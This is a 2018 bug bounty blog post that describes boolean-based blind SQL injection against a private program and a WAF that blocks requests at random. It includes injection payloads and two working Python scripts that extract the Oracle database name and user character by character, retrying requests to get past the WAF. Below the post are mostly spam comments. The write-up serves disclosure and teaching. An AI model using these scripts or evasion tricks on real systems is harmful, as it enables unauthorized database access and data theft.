SQLI amd silly WAF

SQL Injection and A silly WAF Skip to main content SQL Injection and A silly WAF Get link Facebook X Pinterest Email Other Apps July 25, 2018 Hi Folks, Today I'll be writing about some interesting SQL injection vulnerabilities I recently found. This is a private program so I won't be mentioning who the vendor is. #1: WAF? ok! At a lovely hacking night I started testing for a private bug bounty program, after about 30 minutes of throwing random single and double quotes inside all the parameters, one of the endpoints returned an error saying: {"error":"An unexpected error has occured"} So I looked at the request and set the value of the parameter to `23' and '1'='1` and as expected the endpoint returned valid results which means it's vulnerable to SQL injection! That's it, a lovely basic Boolean-Based SQL injection let's write the report and get a nice bounty! But... THE WAF! While further exploiting this vulnerability to extract data from the database as a proof of concept, the endpoint was returning {"error":" undergoing corrective maintenance "} even to normal requests without any SQLi payloads. I later realized that this is probably the WAF blocking some random requests when it suspects an IP address which explains why other researchers haven't reported this obvious SQLi before (maybe they thought it was a false-positive. I also thought that, it took me some time to understand what was going on!) So I wrote a python script that detects when the WAF blocks a request if the response contains "undergoing corrective maintenance" and repeats it until we get response from the server (If we get "Error" or "True" that means we are talking to the server): import requests c = {} # Cookies s = '[email protected]' res = '' restart = True while(restart): restart = False for i in s: if(i == '_'): i = '\\_' # print i p = "23' AND (select lower(ora_database_name) from dual) like '"+str(res)+str(i)+"%" # SQL Query try: r = requests.post("http://target/vulnerable",data={"serialNumber":p}, headers=c) except requests.exceptions.Timeout as e: print "Timed out" while('undergoing corrective' in r.content): # Silly WAF? repeat the request print "Repeating Request" r = requests.post("http://target/vulnerable",data={"serialNumber":p}, headers=c) if "SESSION_EXPIRED" in r.content: print "ERROR - SESSION_EXPIRED" break if "true" in r.content: ## No error, correct char res+=i print res , "found" restart = True break The PoC worked, I reported the vulnerability and received the bounty. I didn't stop right there, now knowing how the WAF works, I kept testing all other endpoints and found a couple more with the same technique. Ok, that probably was not that hard, let's move on to the next level. #2: Fuck you WAF! One of the endpoints (a non-json one) was also vulnerable to boolean based sql injection similar to the one above, but the WAF this time was acting differently. When my SQL query evaluated to `true` the response had a specific word, let's say `2222`, but when it evaluated to false, the application returned a static error page. The problem was that the WAF was returning the exact same response as when the query evaluated to false which means I can't differentiate between a response that was sent by the WAF and a response that was sent by the server when the query is evaluated to false as they both are exactly the same! I kept trying to bypass the WAF but no luck, it was returning the same error page for random requests even when the query evaluated to true so I wasn't able to extract anything from the database. I was about to give up when I came across an idea to write a python script that repeats any request that returns an error page (which means the query was evaluated to false) for 5 times to make sure we get response from the server not the WAF since the WAF was blocking random requests and it actually WORKED! import requests c = {} # cookies s = '[email protected]' res = '' restart = True x = 0 r = '' while(restart): restart = False for i in s: x = 0 if(i == '_'): i = '\\_' p = "6214111' and (SELECT lower(user) from dual) like '"+str(res)+str(i)+"%,2222" # SQL Query try: r = requests.post("https://target/vulnerable2/",data={"Nbr":p}, headers=c) except requests.exceptions.Timeout as e: print "Timed out" if "2222" not in r.content: while("2222" not in r.content and x < 5): ## repeat 5 times to make sure we are talking to the server :) r = requests.post("https://target/vulnerable2/",data={"Nbr":p}, headers=c) x += 1 else: res+=str(i) print res , "found" restart = True break if "2222" in r.content: res+=str(i) print res , "found" restart = True break Again, bug hunted, silly WAF beaten, report sent and bounty granted! I wanted to write about another interesting SQL injection on the same program but since it's a little bit different and has nothing to do with the WAF, I will keep it for the next post. That's it for today, if you have any questions drop me a tweet @Zombiehelp54 Get link Facebook X Pinterest Email Other Apps Comments Unknown March 17, 2019 at 9:51 PM Hi sir .I think i found boolen based sql injection but problem is it is in image download functionality.so when I try to use version() in vulnerable column it isn't printing version.please help Reply Delete Replies Reply sathyaramesh April 9, 2019 at 11:27 PM I am reading your post from the beginning, it was so interesting to read & I feel thanks to you for posting such a good blog, keep updates regularly. Ethical Hacking Course in Chennai Hacking Course in Chennai Hacking Classes in Chennai Blue Prism Training in Chennai CCNA Course in Chennai Cloud Computing Training in Chennai Ethical Hacking Training in OMR Reply Delete Replies Reply Linda May 5, 2019 at 3:50 PM Noice Reply Delete Replies Reply Linda May 5, 2019 at 3:53 PM This comment has been removed by the author. Reply Delete Replies Reply Linda May 5, 2019 at 3:57 PM This comment has been removed by the author. Reply Delete Replies Reply Linda May 5, 2019 at 3:59 PM This comment has been removed by the author. Reply Delete Replies Reply Linda May 5, 2019 at 4:02 PM This comment has been removed by the author. Reply Delete Replies Reply sheela rajesh May 10, 2019 at 9:52 PM Your blog is more informative and inspirational to others.it gives wish to know more about this. JAVA Training in Chennai JAVA Training in Tnagar Selenium Training in Chennai Digital Marketing Course in Chennai Python Training in Chennai Big data training in chennai JAVA Training in Chennai Java Training in Velachery Reply Delete Replies Reply sathyaramesh July 5, 2019 at 11:45 PM Nice blog!! I hope you will share more info like this. I will use this for my studies and research. DevOps Training in Chennai DevOps foundation certification DevOps certification AWS Training in Chennai Cloud Computing Training in Chennai Data Science Training in Chennai DevOps Training in Anna Nagar DevOps Training in Vadapalani DevOps Training in Guindy DevOps Training in Thiruvanmiyur Reply Delete Replies Reply cynthiawilliams July 6, 2019 at 5:59 AM Learned a lot from your post and it is really good. Share more tech updates regularly. Ethical Hacking course in Chennai Ethical Hacking Training in Chennai Hacking course in Chennai ccna course in Chennai Salesforce Training in Chennai AngularJS Training in Chennai PHP Training in Chennai Ethical Hacking course in Tambaram Ethical Hacking course in Velachery Ethical Hacking course in T Nagar Reply Delete Replies Reply Rasi August 19, 2019 at 3:13 AM Thanks for sharing this Informative content. Power BI Training In Hyderabad Power BI Training Power BI Online Training Power BI Training Online Reply Delete Replies Reply Anbarasan14 September 3, 2019 at 11:09 PM Thanks for your blog; I really prefer this blog for my future reference. English Speaking Classes in Mulund IELTS Classes in Mulund German Classes in Mulund French Classes in Mulund Spoken English Classes in Chennai IELTS Coaching in Chennai English Speaking Classes in Mumbai IELTS Classes in Mumbai Spoken English Class in Anna Nagar IELTS Coaching in Tambaram Reply Delete Replies Reply kaushik September 5, 2019 at 2:27 AM Awesome article! You are providing us very valid information. This is worth reading. Keep sharing more such articles. Automation Anywhere Training in Chennai Automation courses in Chennai Machine Learning Training in Chennai Blue Prism Training in Chennai UiPath Training in Chennai Automation Anywhere Training in OMR Automation Anywhere Training in Porur Automation Anywhere Training in T Nagar Automation Anywhere Training in Velachery Reply Delete Replies Reply rtusharkumarrastogi January 13, 2020 at 9:13 PM Thank you for this great information. I’ve only had one Ultrasound guided injection my hip one time. I’ve been considering it for other issues and this information has been very helpful, things I didn’t know about. Regards Ultrasound guided injection Reply Delete Replies Reply datasciencecourse January 28, 2020 at 10:34 PM After reading your article I was amazed. I know that you explain it very well. And I hope that other readers will also experience how I feel after reading your article. artificial intelligence course in mumbai machine learning courses in mumbai Reply Delete Replies Reply digitaltucr January 29, 2020 at 9:49 PM I finally found great post here.I will get back here. I just added your blog to my bookmark sites. thanks.Quality posts is the crucial to invite the visitors to visit the web page, that's what this web page is providing. ExcelR Data Science training in Mumbai Reply Delete Replies Reply rama venkata February 23, 2020 at 9:22 PM Great blog!!try to create a blog for digital marketing and post Digital marketing course in Hyderabad-360DigiTMG Reply Delete Replies Reply bavisthra March 13, 2020 at 12:04 AM Study Artificial Intelligence Course with ExcelR where you get a great experience and better knowledge. Artificial Intelligence Course Location 1: ExcelR - Data Science, Data Analytics Course Training in Bangalore 49, 1st Cross, 27th Main BTM Layout stage 1 Behind Tata Motors Bengaluru, Karnataka 560068 Phone: 096321 56744 Hours: Sunday - Saturday 7AM - 11PM Location 2: ExcelR #49, Ground Floor, 27th Main, Near IQRA International School, opposite to WIF Hospital, 1st Stage, BTM Layout, Bengaluru, Karnataka 560068 Phone: 070224 51093 Hours: Sunday - Saturday 7AM - 10PM Reply Delete Replies Reply dataexpert March 26, 2020 at 1:43 AM Very nice job... Thanks for sharing this amazing and educative blog post! ExcelR Digital Marketing Class In Pune Reply Delete Replies Reply Add comment Load more... Post a Comment Popular posts from this blog Handlebars template injection and RCE in a Shopify app April 04, 2019 TL;DR We found a zero-day within a JavaScript template library called handlebars and used it to get Remote Code Execution in the Shopify Return Magic app. The Story: In October 2018, Shopify organized the HackerOne event "H1-514" to which some specific researchers were invited and I was one of them. Some of the Shopify apps that were in scope included an application called "Return Magic" that would automate the whole return process when a customer wants to return a product that they already purchased through a Shopify store. Looking at the application, I found that it has a feature called Email WorkFlow where shop owners can customize the email message sent to users once they return a product. Users could use variables in their template such as {{order.number}} , {{email}} ..etc. I decided to test this feature for Server Side Template injection and entered {{this}} {{self}} then sent a test email to myself and the email had [object Object] within ... Read more SQL Injection: Utilizing XML Functions in Oracle and PostgreSQL to bypass WAFs February 13, 2023 TL;DR. In this blog post we will be discussing how built-in XML functions in Oracle and PostgreSQL database management systems can be used to bypass web application firewalls (WAFs). I will be presenting two real-life examples from private bug bounty programs where traditional methods for bypassing WAFs were not effective. Introduction It's really frustrating when you find a valid SQL injection vulnerability, but there isn't much to do because of a WAF blocking most of your payloads. Many WAF rules can be bypassed using character case switching, comments, splitting the payload into multiple parameters, double URL encoding and many other methods that depend on how the target application and the WAF handle your requests. However, In the cases we are discussing in this blog, I was not able to bypass the WAF using common WAF bypass methods. Case 1: SQL Injection in an Oracle database - WAF bypass using REGEXP_LIKE() and DBMS_XMLGEN.GETXMLTYPE() *This is a private bug bounty prog... Read more Exploiting Out Of Band XXE using internal network and php wrappers August 06, 2019 Hello hackers, A couple of weeks ago I tweeted about exploiting an out of band XXE vulnerability with a firewall blocking all outgoing requests including DNS lookups, so here is the full story: This is a private bug bounty program so I won't be mentioning who the vendor is. As usual during a hacking night while navigating the target application I came across an endpoint that took a parameter called xml but its value was encrypted. Later I found out that XML data sent to the backend is encrypted in the client side before sent in HTTP requests which means that XML data might not be properly validated in the backend, so I wanted to modify it to be able to inject my own XXE payload. So what I first tried was to find the JavaScript function used to encrypt the XML and do the same for my custom XML payload, however, the application's JavaScript was minimized with WebPack which made it very hard to read and trace functions. To avoid the hassle of finding the JavaScript encrypting... Read more Mahmoud Gamal Visit profile Archive 2023 1 February 1 2019 2 August 1 April 1 2018 1 July 1 SQL Injection and A silly WAF 2017 2 June 1 February 1 2015 2 November 1 September 1 Show more Show less Labels google hackerone hacking javascript nodejs sandbox security SQL Injection WAF WAF ByPass xss Show more Show less Report Abuse